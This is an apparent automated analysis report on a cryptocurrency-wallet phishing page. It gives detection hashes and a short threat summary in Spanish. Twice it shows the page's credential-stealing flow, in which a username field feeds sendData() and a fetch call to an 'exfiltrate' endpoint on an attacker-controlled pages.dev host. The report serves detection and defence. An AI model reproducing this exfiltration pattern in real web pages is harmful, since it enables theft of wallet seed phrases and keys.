Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T11533D8B317491EFE10C783E0B722773673A863E5E5AF820682F847655B8BD4ADC63560 |
|
CONTENT
ssdeep
|
384:arhbSgbnziNBXELiy/Y+nPacLI/omC4mGHXISBhq8t8DDOmQpvqYtZ:4bbnzsZELk+Cuz63HX38umQpiQ |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
ce9234343696973e |
|
VISUAL
aHash
|
76383c3c30383000 |
|
VISUAL
dHash
|
c4f06969e0e0e0e0 |
|
VISUAL
wHash
|
7e787c7c7c783800 |
|
VISUAL
colorHash
|
38001600080 |
|
VISUAL
cropResistant
|
c4f06969e0e0e0e0 |
• Amenaza: Phishing
• Objetivo: Usuarios de billeteras de criptomonedas
• Método: Impersonación e intento de robar credenciales de billeteras.
• Exfil: Desconocido, probablemente a un servidor controlado por atacantes.
• Indicadores: Alojamiento gratuito, apariencia similar a la marca, 'rectificación de billetera'.
• Riesgo: Alto
The site likely aims to trick users into entering their wallet credentials (seed phrases, private keys, etc.) on a fake login page.
User fills <input name=username> → sendData() → fetch(http://dusktestresolve.pages.dev/exfiltrate) → credentials sent
User fills <input name=username> → sendData() → fetch(http://dusktestresolve.pages.dev/exfiltrate) → credentials sent
coinMarquee.jssendDatasubmitFormPages with identical visual appearance (based on perceptual hash)
Found 1 other scan for this domain